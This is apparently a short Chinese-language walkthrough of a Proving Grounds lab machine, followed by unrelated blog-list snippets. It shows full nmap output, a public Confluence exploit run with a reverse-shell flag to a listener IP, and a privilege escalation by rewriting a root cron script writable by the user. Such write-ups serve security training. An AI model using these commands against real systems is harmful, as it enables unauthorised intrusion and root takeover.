nmap 
┌──(root㉿kali)-[/home/ftpuserr]

└─# nmap -p- -A 192.168.192.41

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-06 03:24 UTC

Nmap scan report for 192.168.192.41

Host is up (0.071s latency).

Not shown: 65532 closed tcp ports (reset)

PORT     STATE SERVICE       VERSION

22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)

|_  256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)

8090/tcp open  opsmessaging?

| fingerprint-strings:

|   GetRequest:

|     HTTP/1.1 302

|     Cache-Control: no-store

|     Expires: Thu, 01 Jan 1970 00:00:00 GMT

|     X-Confluence-Request-Time: 1733455516608

|     Set-Cookie: JSESSIONID=009E9230366A751C5A99496194B6FE18; Path=/; HttpOnly

|     X-XSS-Protection: 1; mode=block

|     X-Content-Type-Options: nosniff

|     X-Frame-Options: SAMEORIGIN

|     Content-Security-Policy: frame-ancestors 'self'

|     Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true

|     Content-Type: text/html;charset=UTF-8

|     Content-Length: 0

|     Date: Fri, 06 Dec 2024 03:25:16 GMT

|     Connection: close

|   HTTPOptions:

|     HTTP/1.1 200

|     MS-Author-Via: DAV

|     Content-Type: text/html;charset=UTF-8

|     Content-Length: 0

|     Date: Fri, 06 Dec 2024 03:25:16 GMT

|     Connection: close

|   RTSPRequest:

|     HTTP/1.1 400

|     Content-Type: text/html;charset=utf-8

|     Content-Language: en

|     Content-Length: 1924

|     Date: Fri, 06 Dec 2024 03:25:16 GMT

|     Connection: close

|     <!doctype html><html lang="en"><head><title>HTTP Status 400

|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400

|_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid

8091/tcp open  jamlink?

| fingerprint-strings:

|   FourOhFourRequest:

|     HTTP/1.1 204 No Content

|     Server: Aleph/0.4.6

|     Date: Fri, 06 Dec 2024 03:25:52 GMT

|     Connection: Close

|   GetRequest:

|     HTTP/1.1 204 No Content

|     Server: Aleph/0.4.6

|     Date: Fri, 06 Dec 2024 03:25:21 GMT

|     Connection: Close

|   HTTPOptions:

|     HTTP/1.1 200 OK

|     Access-Control-Allow-Origin: *

|     Access-Control-Max-Age: 31536000

|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST

|     Server: Aleph/0.4.6

|     Date: Fri, 06 Dec 2024 03:25:21 GMT

|     Connection: Close

|     content-length: 0

|   Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie:

|     HTTP/1.1 414 Request-URI Too Long

|     text is empty (possibly HTTP/0.9)

|   RTSPRequest:

|     HTTP/1.1 200 OK

|     Access-Control-Allow-Origin: *

|     Access-Control-Max-Age: 31536000

|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST

|     Server: Aleph/0.4.6

|     Date: Fri, 06 Dec 2024 03:25:21 GMT

|     Connection: Keep-Alive

|     content-length: 0

|   SIPOptions:

|     HTTP/1.1 200 OK

|     Access-Control-Allow-Origin: *

|     Access-Control-Max-Age: 31536000

|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST

|     Server: Aleph/0.4.6

|     Date: Fri, 06 Dec 2024 03:25:57 GMT

|     Connection: Keep-Alive

|_    content-length: 0

2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============

SF-Port8090-TCP:V=7.94SVN%I=7%D=12/6%Time=67526E9C%P=x86_64-pc-linux-gnu%r

SF:(GetRequest,22F,"HTTP/1\.1\x20302\x20\r\nCache-Control:\x20no-store\r\n

SF:Expires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nX-Confluenc

SF:e-Request-Time:\x201733455516608\r\nSet-Cookie:\x20JSESSIONID=009E92303

SF:66A751C5A99496194B6FE18;\x20Path=/;\x20HttpOnly\r\nX-XSS-Protection:\x2

SF:01;\x20mode=block\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Opti

SF:ons:\x20SAMEORIGIN\r\nContent-Security-Policy:\x20frame-ancestors\x20's

SF:elf'\r\nLocation:\x20http://localhost:8090/login\.action\?os_destinatio

SF:n=%2Findex\.action&permissionViolation=true\r\nContent-Type:\x20text/ht

SF:ml;charset=UTF-8\r\nContent-Length:\x200\r\nDate:\x20Fri,\x2006\x20Dec\

SF:x202024\x2003:25:16\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(HTTPOpti

SF:ons,97,"HTTP/1\.1\x20200\x20\r\nMS-Author-Via:\x20DAV\r\nContent-Type:\

SF:x20text/html;charset=UTF-8\r\nContent-Length:\x200\r\nDate:\x20Fri,\x20

SF:06\x20Dec\x202024\x2003:25:16\x20GMT\r\nConnection:\x20close\r\n\r\n")%

SF:r(RTSPRequest,820,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;c

SF:harset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x201924\r\nD

SF:ate:\x20Fri,\x2006\x20Dec\x202024\x2003:25:16\x20GMT\r\nConnection:\x20

SF:close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x

SF:20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type

SF:=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20

SF:h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{fo

SF:nt-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x2

SF:0p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px

SF:;background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x2

SF:0Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1><hr\x20class=\"lin

SF:e\"\x20/><p><b>Type</b>\x20Exception\x20Report</p><p><b>Message</b>\x20

SF:Invalid\x20character\x20found\x20in\x20the\x20HTTP\x20protocol\x20\[RTS

SF:P/1\.00x0d0x0a0x0d0x0a\.\.\.\]</p><p><b>Description</b>\x20The\x20s

SF:erver\x20cannot\x20or\x20will\x20not\x20process\x20the\x20request\x20du

SF:e\x20to\x20something\x20that\x20is\x20perceived\x20to\x20be\x20a\x20cli

SF:ent\x20error\x20\(e\.g\.,\x20malformed\x20request\x20syntax,\x20invalid

SF:\x20");

==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============

SF-Port8091-TCP:V=7.94SVN%I=7%D=12/6%Time=67526EA1%P=x86_64-pc-linux-gnu%r

SF:(GetRequest,68,"HTTP/1\.1\x20204\x20No\x20Content\r\nServer:\x20Aleph/0

SF:\.4\.6\r\nDate:\x20Fri,\x2006\x20Dec\x202024\x2003:25:21\x20GMT\r\nConn

SF:ection:\x20Close\r\n\r\n")%r(HTTPOptions,EC,"HTTP/1\.1\x20200\x20OK\r\n

SF:Access-Control-Allow-Origin:\x20\*\r\nAccess-Control-Max-Age:\x20315360

SF:00\r\nAccess-Control-Allow-Methods:\x20OPTIONS,\x20GET,\x20PUT,\x20POST

SF:\r\nServer:\x20Aleph/0\.4\.6\r\nDate:\x20Fri,\x2006\x20Dec\x202024\x200

SF:3:25:21\x20GMT\r\nConnection:\x20Close\r\ncontent-length:\x200\r\n\r\n"

SF:)%r(RTSPRequest,F1,"HTTP/1\.1\x20200\x20OK\r\nAccess-Control-Allow-Orig

SF:in:\x20\*\r\nAccess-Control-Max-Age:\x2031536000\r\nAccess-Control-Allo

SF:w-Methods:\x20OPTIONS,\x20GET,\x20PUT,\x20POST\r\nServer:\x20Aleph/0\.4

SF:\.6\r\nDate:\x20Fri,\x2006\x20Dec\x202024\x2003:25:21\x20GMT\r\nConnect

SF:ion:\x20Keep-Alive\r\ncontent-length:\x200\r\n\r\n")%r(Help,46,"HTTP/1\

SF:.1\x20414\x20Request-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty\x20\

SF:(possibly\x20HTTP/0\.9\)")%r(SSLSessionReq,46,"HTTP/1\.1\x20414\x20Requ

SF:est-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty\x20\(possibly\x20HTTP

SF:/0\.9\)")%r(TerminalServerCookie,46,"HTTP/1\.1\x20414\x20Request-URI\x2

SF:0Too\x20Long\r\n\r\ntext\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)")%

SF:r(TLSSessionReq,46,"HTTP/1\.1\x20414\x20Request-URI\x20Too\x20Long\r\n\

SF:r\ntext\x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)")%r(Kerberos,46,"HT

SF:TP/1\.1\x20414\x20Request-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty

SF:\x20\(possibly\x20HTTP/0\.9\)")%r(FourOhFourRequest,68,"HTTP/1\.1\x2020

SF:4\x20No\x20Content\r\nServer:\x20Aleph/0\.4\.6\r\nDate:\x20Fri,\x2006\x

SF:20Dec\x202024\x2003:25:52\x20GMT\r\nConnection:\x20Close\r\n\r\n")%r(LP

SF:DString,46,"HTTP/1\.1\x20414\x20Request-URI\x20Too\x20Long\r\n\r\ntext\

SF:x20is\x20empty\x20\(possibly\x20HTTP/0\.9\)")%r(LDAPSearchReq,46,"HTTP/

SF:1\.1\x20414\x20Request-URI\x20Too\x20Long\r\n\r\ntext\x20is\x20empty\x2

SF:0\(possibly\x20HTTP/0\.9\)")%r(SIPOptions,F1,"HTTP/1\.1\x20200\x20OK\r\

SF:nAccess-Control-Allow-Origin:\x20\*\r\nAccess-Control-Max-Age:\x2031536

SF:000\r\nAccess-Control-Allow-Methods:\x20OPTIONS,\x20GET,\x20PUT,\x20POS

SF:T\r\nServer:\x20Aleph/0\.4\.6\r\nDate:\x20Fri,\x2006\x20Dec\x202024\x20

SF:03:25:57\x20GMT\r\nConnection:\x20Keep-Alive\r\ncontent-length:\x200\r\

SF:n\r\n");

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.94SVN%E=4%D=12/6%OT=22%CT=1%CU=30020%PV=Y%DS=4%DC=T%G=Y%TM=6752

OS:6F0A%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)

OS:OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578ST11NW7%O5=M578

OS:ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)

OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%

OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T

OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=

OS:Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK

OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)

HOP RTT      ADDRESS

1   69.77 ms 192.168.45.1

2   69.57 ms 192.168.45.254

3   70.75 ms 192.168.251.1

4   70.80 ms 192.168.192.41

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 167.99 seconds

访问8090端口

发现版本

搜exp

https://github.com/jbaines-r7/through_the_wire

python3 exp.py --rhost 192.168.192.41 --rport 8090 --lhost 192.168.45.250 --protocol http:// --reverse-shell

反弹shell成功

发现定时任务

发现这文件定时任务执行者是root但是 所有这竟然是我们当前用户



那直接改写脚本提权了 太简单了

提权成功

半个小时搞定

Flu PG walkthrough Intermediate的更多相关文章

  1. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  2. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  3. PG 中 JSON 字段的应用

    13 年发现 pg 有了 json 类型,便从 oracle 转 pg,几年下来也算比较熟稔了,总结几个有益的实践. 用途一:存储设计时无法预料的文档性的数据.比如,通常可以在人员表准备一个 json ...

  4. pg gem 安装(postgresql94)

    使用下面命令安装报错 gem install pg 错误: [root@AS-test middle_database]# gem install pgBuilding native extensio ...

  5. #pg学习#postgresql的安装

    1.按照官网给的步骤编译安装(Mac安装是比较容易的,相比Liunx) cd /Users/renlipeng/Desktop/postgresql-9.5.1 ./configure --prefi ...

  6. PG 函数的易变性(Function Volatility Categories)

    此概念的接触是在做分区表的时候碰到的,分区表按时间字段分区,在查询时当where条件中时间为now()或者current_time()等时是无法查询的,即使进行格式转换也不行,只有是时间格式如‘201 ...

  7. c++错误——intermediate.manifest : general error c1010070很傻的错

    .\Debug\sadf.exe.intermediate.manifest : general error c1010070: Failed to load and parse the manife ...

  8. mysql 序列与pg序列的比较

    mysql序列(这里只谈innodb引擎): 在使用mysql的AUTO_INCREMENT时,使用AUTO_INCREMENT的字段必须建有索引,也可以为索引的一部分.当没有索引时会报错:      ...

  9. 使用zfs进行pg的pitr恢复测试

    前段时间做了一下zfs做pg的增量恢复测试,mark一下. 服务器信息: 主机:192.168.173.43 备机:192.168.173.41 主备使用流复制搭建,在备机上面进行了zfs快照备份. ...

  10. PG CREATEINDEX CONCURRENTLY

    PG CREATEINDEX CONCURRENTLY [TOC] 官方说法 根据9.1的文档 Creating an index can interfere with regular operati ...

随机推荐

  1. 超实用!阿里云应用——Air780EP低功耗4G模组AT开发示例

    ​ Air780EP是合宙推出的一款低功耗4G全网通模组,兼容模组行业1618经典封装,支持OpenCPU开发及全功能数传AT开发,可广泛应用于多样化的物联网终端. 针对客户朋友需求反馈,本期特别推出 ...

  2. delphi Image32 SVG图形查看器

    DELPHI 中没有SVG显示组件,需要用到第三方组件,高版本可以使用skia(但必须带上skia.dll). 最新版Image32修改了很多,SVGIconImageList 也因此换成了Image ...

  3. bootstrap-fileinput使用手册

    一.准备 1.插件下载地址:https://github.com/kartik-v/bootstrap-fileinput/ 下载后的压缩包解压文件夹内容如下: js:插件核心js代码,引用filei ...

  4. 使用Tomcat插件开发WEB应用

    在Eclipse中,可以安装Tomcat插件,实现WEB应用的开发调试工作,Tomcat插件还可以支持WEB应用的热部署. 一.安装配置Tomcat插件 可以通过拷贝安装和Links方式安装Tomca ...

  5. Go Vue3 CMS管理后台(前后端分离模式)

    本后台使用前后端分离模式开发,前端UI为Vue3+Ant Design Vue,后端Api为Go+Gin,解耦前后端逻辑,使开发更专注 技术栈 前端:Vue3,Ant Design Vue,Axios ...

  6. Ant Design Pro项目ProTable怎么实现单元格合并效果

    前情 公司有经常需要做一些后台管理页面,我们选择了Ant Design Pro,它是基于 Ant Design 和 umi 的封装的一整套企业级中后台前端/设计解决方案. 产品效果图 最新接到的一个后 ...

  7. OS之《CPU调度》

    CPU调度层次 高级调度:是作业调度.将外村的作业加载到内存里,分配对应的资源,然后加入就绪队列 低级调度:将就绪队列中的进程调度到CPU执行 中级调度:为了提高内存的利用率和系统的吞吐量,将暂时不能 ...

  8. PCB设计AD规则设置(按照嘉立创设置)

    本文转载自https://blog.csdn.net/subtitle_/article/details/121648972 官方参考https://www.jlc.com/portal/vtechn ...

  9. LocalLLaMA 客户端试验

    LM Studio. 可以直接下 hg 模型(实际使用需要自己修改成中国镜像). 有 local server, 符合 openai api 规范. 遗憾的是不支持选择显卡导致无法使用. Farada ...

  10. nexus如何上传自己的依赖包

    一.创建第三方包仓库创建第三方jar包的仓库选用hosted 取名为nexus-3rd 然后再public组中加入nexus-3rd,交给public管理 二.创建用户仓库创建完成以后可以创建一个管理 ...